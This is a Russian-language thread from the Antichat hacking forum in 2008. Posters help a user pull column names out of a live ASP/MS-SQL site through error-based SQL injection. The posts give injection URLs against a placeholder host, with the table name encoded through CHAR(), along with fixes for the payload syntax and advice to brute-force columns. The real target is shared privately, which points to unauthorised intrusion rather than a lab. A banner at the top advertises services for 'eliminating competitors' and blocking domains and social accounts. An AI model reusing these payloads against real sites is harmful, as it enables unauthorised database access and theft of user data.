Форум АНТИЧАТ - Получение колонок через MS-SQL injection.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Получение колонок через MS-SQL injection.

Опции темы

Поиск в этой теме

Опции просмотра

Получение колонок через MS-SQL injection.

06.10.2008, 00:19

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

Отправить сообщение для Dima-k17 с помощью ICQ

Получение колонок через MS-SQL injection.

Всем здрасте!=)
При банальном запросе вида:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name='a_users')--
Получил ошибку, следующего содержания:

Код:

Microsoft OLE DB Provider for SQL Server error '80040e14' 

Joined tables cannot be specified in a query containing outer join operators. View or function 'information_schema.columns' contains joined tables. 

/details.asp, line 59

Вопрос, реально ли в этой ситуации выдернуть имена столбцов, или придется перебирать? И если реально - то как это сделать?

06.10.2008, 00:44

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

Код:

http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--

06.10.2008, 01:09

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от ~!DoK_tOR!~

Код:

http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--

Вот так делать не надо, будет ошибка :
The char function requires 1 arguments.

Если уж char , то вот так : char(97)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar (101)%2Bchar(114)%2Bchar(115)

Но ИМХО дело не в этом, ошибка какая-то не та. Если не то, давай линк, а то гадания опять на три страницы будут

06.10.2008, 01:17

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

колонки придется брутить, jokester inurl:details.asp?memberid=244247 только 1 линк)

Цитата:

Сообщение от ~!DoK_tOR!~

Код:

http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--

мда.......

06.10.2008, 01:53

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

jokester, l1ght - линк в ПМ.
А доктору и гисти по минусу бы поставить:-D

Последний раз редактировалось Dima-k17; 06.10.2008 в 01:56..

06.10.2008, 05:58

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

Проблема решилась много проще=) все 97 столбцов оказались числовыми....

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход